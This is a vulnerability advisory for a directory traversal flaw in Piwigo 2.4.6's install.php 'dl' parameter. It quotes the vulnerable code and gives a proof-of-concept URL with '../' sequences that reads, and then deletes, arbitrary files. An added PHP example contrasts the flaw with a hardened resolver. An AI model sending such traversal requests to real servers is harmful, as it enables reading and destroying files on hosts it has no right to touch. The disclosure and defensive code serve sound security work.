Piwigo is a photo gallery script written in PHP.
Piwigo 2.4.6 and other versions do not properly validate the value of the 'dl' parameter of the install.php script: the only check is that the path built by prepending 'pwg_' to the parameter exists. An attacker can use directory traversal in 'dl' to read arbitrary files on the affected host, and because the handler unlinks the file after sending it, every successful read also deletes that file within the affected application's context.
====================================================================
/install.php (lines 113-124):
-------------
if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
{
  $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
  header('Cache-Control: no-cache, must-revalidate');
  header('Pragma: no-cache');
  header('Content-Disposition: attachment; filename="database.inc.php"');
  header('Content-Transfer-Encoding: binary');
  header('Content-Length: '.filesize($filename));
  echo file_get_contents($filename);
  unlink($filename);
  exit();
}
====================================================================
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
15.02.2013

--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
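The following is an added example written for this page, not Piwigo's own code. It places install.php's path construction next to a hardened resolver for 'dl' and, with a purely lexical '..' resolver, shows why the 'pwg_' prefix is no barrier: a resolver that collapses '..' without checking that the segment 'pwg_..' exists simply pops it, which is how the PoC above walks out of the data directory (a resolver that consults the filesystem component by component, as a plain stat() on Linux does, fails at 'pwg_..' unless such a directory really exists). The temporary data directory, the file names and the helper functions unsafe_dl_path, lexical_normalize and safe_dl_path are all assumptions of this example.

```php
<?php
// Added example for this page, not Piwigo code. It contrasts install.php's
// path construction with a hardened resolver for the 'dl' parameter and
// shows why the 'pwg_' prefix does not prevent traversal.
declare(strict_types=1);

// Same construction as the vulnerable install.php: 'pwg_' is merely glued in
// front of attacker-controlled input and the only guard is file_exists().
function unsafe_dl_path(string $dataDir, string $dl): string
{
    return $dataDir . 'pwg_' . $dl;
}

// Lexical '..' handling, as done by Windows path normalisation and by any code
// that "cleans" a path string without consulting the filesystem: the
// nonexistent segment 'pwg_..' is simply popped by the '..' that follows it.
function lexical_normalize(string $path): string
{
    $absolute = preg_match('~^[\\\\/]~', $path) === 1;
    $out = [];
    foreach (preg_split('~[\\\\/]+~', $path) as $seg) {
        if ($seg === '' || $seg === '.') {
            continue;
        }
        if ($seg === '..') {
            if ($out !== [] && end($out) !== '..') {
                array_pop($out);   // climb out of the previous segment
            } else {
                $out[] = '..';     // already at the top: escape one level further
            }
            continue;
        }
        $out[] = $seg;
    }
    return ($absolute ? '/' : '') . implode('/', $out);
}

// Hardened resolver: absolute path of the file to serve, or null to refuse.
function safe_dl_path(string $dataDir, string $dl): ?string
{
    // Whitelist the token shape (letters, digits, '_' and '-' only). With '.'
    // and separators excluded, neither 'pwg_..' nor a NUL byte can be formed.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $dl) !== 1) {
        return null;
    }
    $base = realpath($dataDir);
    if ($base === false) {
        return null;
    }
    // realpath() follows symlinks and collapses '..', so the containment check
    // also refuses a planted symlink inside $dataDir that points elsewhere.
    $real = realpath($base . DIRECTORY_SEPARATOR . 'pwg_' . $dl);
    if ($real === false || !is_file($real) || dirname($real) !== $base) {
        return null;
    }
    return $real;
}

// Constructed demo: a throwaway data directory holding one legitimate
// 'pwg_' export, plus a file one level above it that must stay unreachable.
$tmp = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pwgdemo_' . bin2hex(random_bytes(4));
$dataDir = $tmp . DIRECTORY_SEPARATOR . 'data' . DIRECTORY_SEPARATOR;
mkdir($dataDir, 0700, true);
file_put_contents($dataDir . 'pwg_export', "legitimate export\n");
file_put_contents($tmp . DIRECTORY_SEPARATOR . 'secret.txt', "outside the data dir\n");

$inputs = [
    'export',                                    // legitimate token
    '../../secret.txt',                          // 1st '..' pops 'pwg_..', 2nd leaves data/
    '..\\..\\secret.txt',                        // Windows separator variant
    str_repeat('../', 6) . 'lio_passwords.txt',  // shape of the advisory's PoC
];
foreach ($inputs as $dl) {
    $unsafe = unsafe_dl_path($dataDir, $dl);
    printf("dl='%s'\n  unsafe path  : %s\n  lexical view : %s\n  hardened     : %s\n",
        $dl,
        $unsafe,
        lexical_normalize($unsafe),
        safe_dl_path($dataDir, $dl) ?? 'REJECTED');
}

unlink($dataDir . 'pwg_export');
unlink($tmp . DIRECTORY_SEPARATOR . 'secret.txt');
rmdir($dataDir);
rmdir($tmp);
```

Run it with `php example.php`. Only the literal token 'export' resolves; every traversal variant is refused by the whitelist before the filesystem is touched, while the "lexical view" line shows where the same input lands once '..' is collapsed without an existence check. The realpath() containment test is kept as a second layer so that a token which passes the regex still cannot be served if it resolves, through a symlink, to a file outside the data directory.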